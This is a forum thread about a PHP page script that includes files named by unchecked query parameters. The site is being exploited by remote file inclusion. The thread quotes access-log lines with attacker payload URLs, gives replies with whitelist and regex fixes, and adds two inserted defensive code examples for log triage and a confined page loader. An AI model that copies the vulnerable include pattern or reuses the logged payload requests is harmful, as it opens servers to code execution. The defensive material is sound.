PHP Code security exploit (PHP injection) How do I fix this?


Hi Everyone,

 

I've got the following code in a PHP file which opens up a .HTM

 

<?php
if (isset($_GET["page"])){
    $thepage = $_GET["page"];
    $thetype = $_GET["type"];
    include $thepage.'.'.$thetype;
}
?>

 

The problem is, this code is being exploited (see below for example).

 

Does anyone know how to stop this? :(

 

189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0"

70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0"

124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0"

189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"

189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)"


cheers,

Andrew
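The log lines above are exactly the kind of thing a defender wants to sweep an access log for. Here is an added example (not code from the original post) of a small triage script: it parses Apache "combined" log lines and flags any request, or referer, whose include-controlling parameters carry a URL, a parent-directory step, or a null byte. The parameter names in INCLUDE_PARAMS and the three sample log lines are constructed for this example in the style of the post's log; they are not the post's real entries.

```php
<?php
// Added example, not code from the original post: triage Apache "combined" access-log
// lines for requests that try to feed a URL or a traversal path into an include()
// parameter. The log lines at the bottom are constructed in the style of the post.

/** Query parameters this application hands to include(); extend for your own app. */
const INCLUDE_PARAMS = ['page', 'type', 'pg'];

/** Split one combined-format log line into fields; null if the line does not match. */
function parse_combined_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, rtrim($line), $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'path' => $m[4], 'status' => (int) $m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

/** Reasons a URL looks like a file-inclusion probe; an empty array means nothing suspicious. */
function inclusion_indicators(string $url): array
{
    $reasons = [];
    $query = (string) parse_url($url, PHP_URL_QUERY);
    parse_str($query, $params);             // splits on "&" and URL-decodes each value once
    foreach (INCLUDE_PARAMS as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        // A scheme anywhere in the value: the post's logs show it both at the start
        // (page=http://...) and buried behind a second "?" (page=dvd/display.php?pg=http://...).
        if (stripos($value, '://') !== false || preg_match('#^(data|php):#i', $value)) {
            $reasons[] = "$name carries a URL or stream wrapper (remote inclusion attempt)";
        }
        if (preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $value)) {
            $reasons[] = "$name steps to a parent directory (path traversal)";
        }
        if (strpos($value, "\0") !== false) {
            $reasons[] = "$name contains a null byte";
        }
    }
    return $reasons;
}

/** Return one finding per suspicious request or referer across the given log lines. */
function triage_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        $entry = parse_combined_line($line);
        if ($entry === null) {
            continue;
        }
        // Check the request and the referer: in the post's favicon hits the probe is
        // visible only in the referer, because the browser fetched the icon afterwards.
        foreach (['request' => $entry['path'], 'referer' => $entry['referer']] as $where => $url) {
            $reasons = inclusion_indicators($url);
            if ($reasons) {
                $findings[] = ['line' => $n + 1, 'ip' => $entry['ip'], 'time' => $entry['time'],
                               'where' => $where, 'status' => $entry['status'], 'reasons' => $reasons];
            }
        }
    }
    return $findings;
}

// Constructed sample lines (not the post's real entries): a harmless crawler fetch,
// a probe in the request itself, and a probe visible only in the referer.
$sampleLog = [
    '192.0.2.10 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwars&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; ExampleBot)"',
    '192.0.2.20 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://remote.invalid/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.example.com/dvdgeneraldisplay.php?page=http://remote.invalid/teste2.txt?" "Opera/9.52"',
];
foreach (triage_log($sampleLog) as $f) {
    printf("line %d  %s  %s  [%s, HTTP %d]\n  - %s\n", $f['line'], $f['ip'], $f['time'],
           $f['where'], $f['status'], implode("\n  - ", $f['reasons']));
}
```

Run it against the real log with `file('/path/to/access_log')` in place of `$sampleLog`. The HTTP status in each finding matters: a 200 on a probe means the include most likely succeeded, which is what Andrew's third and fourth lines show, so those are the entries to act on first.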

1. This has nothing to do with object oriented programming (OOP).

2. Code tags are your friends.

3. Your problem stems from not securing your incoming query strings.  At all.

 

A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages).  Then you can compare the incoming value with your list of legit pages.

 

$allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names
$page = isset($_GET['page']) ? strtolower($_GET['page']) : ''; //make sure the incoming value is all lowercase
$type = 'htm'; //fixed extension; the original snippet left $type undefined

if(!in_array($page, $allowedPages, true)) //strict comparison, so only an exact match passes
{
   echo "I don't think so....";
}
else
{
   include $page . '.' . $type;
}


Hi Nightslyr, unfortunately my site has quite a few pages, any other ideas?

http://www.pacote270178.xpg.com.br/teste2.txt

 

 

lol.....  It looks like whoever exploited your site is using your server to mass email.  Depending on how many people he's spamming, you may get some fun messages soon ;p.


First off, don't let people pass in the extension.  There's no reason to.  I would use just PHP pages.

 

Second, restrict it somehow.  A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following:


$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
// Allow only letters, digits, underscore, space and hyphen; the pattern needs "/" delimiters,
// and the .php extension is fixed here rather than taken from the request.
if(preg_match('/^[a-zA-Z0-9_ -]+$/', $page) && file_exists('some/folder/' . $page . '.php')) {
    require 'some/folder/' . $page . '.php';
}
else {
    echo "Page not found!";
}
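Corbin's approach (fixed extension, allow-list pattern, existence check) is the right shape. The following is an added example, not Corbin's code, that carries it one step further: it also confines the resolved file to the page directory with realpath(), so a symlink or a future relaxation of the pattern cannot walk out of it, and it permits one subdirectory level because the rewrite rule in this thread passes values like page=dvd/dvd.... PAGE_DIR and the helper names resolve_page() and load_page() are assumptions for this example.

```php
<?php
// Added example (not Corbin's code): a page loader that uses the request value only as a
// validated slug, fixes the extension, and confines the resolved file to one directory.
// PAGE_DIR and the helper names are assumptions for this example.

/** Directory that holds nothing but the includable page files (assumed path). */
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Resolve a user-supplied page name to an absolute file path inside PAGE_DIR,
 * or return null when the name is not an allowed page.
 */
function resolve_page(string $page): ?string
{
    // 1. Syntactic allow-list: letters, digits, underscore, hyphen, with at most one
    //    subdirectory level such as "dvd/dvdclonewars" (what the thread's rewrite rule
    //    passes). \A and \z instead of ^ and $, so a trailing newline is refused too.
    if (!preg_match('#\A[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)?\z#', $page)) {
        return null;
    }
    // 2. The extension is fixed here and never taken from the request.
    $candidate = PAGE_DIR . '/' . $page . '.php';
    // 3. Confinement: realpath() resolves symlinks and "..", and the result must still
    //    start with the page directory. Cheap belt-and-braces on top of step 1.
    $base = realpath(PAGE_DIR);
    $real = realpath($candidate);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

/** Include the requested page, or answer 404 when it is not an allowed page. */
function load_page(array $get): void
{
    $page = isset($get['page']) ? trim((string) $get['page']) : 'default';
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found!';
        return;
    }
    require $file;
}

// Illustrative inputs of the kind that reach the script through the query string:
// the first two are accepted only if the file exists under PAGE_DIR, the rest are
// rejected by the pattern before the filesystem is consulted at all.
foreach (['home', 'dvd/dvdclonewars', '../config', 'http://remote.invalid/x.txt', "home\n"] as $p) {
    printf("%-36s -> %s\n", var_export($p, true), resolve_page($p) ?? 'rejected');
}
// In the real script the entry point would simply be: load_page($_GET);
```

Two design notes. The pattern does the real work; realpath() is there so that a mistake elsewhere (a symlink dropped into the pages directory, someone later adding "." to the character class) still cannot reach outside PAGE_DIR. And because the extension is appended by the code, a type parameter is never needed, which is Corbin's first point.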


Hi Corbin,

 

thanks for your help.

 

Just a quick question, I have a .htaccess file which displays the following:

 

RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC]

 

and I put the following code in:


<?php
$page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default';
if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) {
    require 'dvd/' . $page . '.php;
}
else {
    echo "Page not found!";
}
?

 

Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111

 

What am I missing?
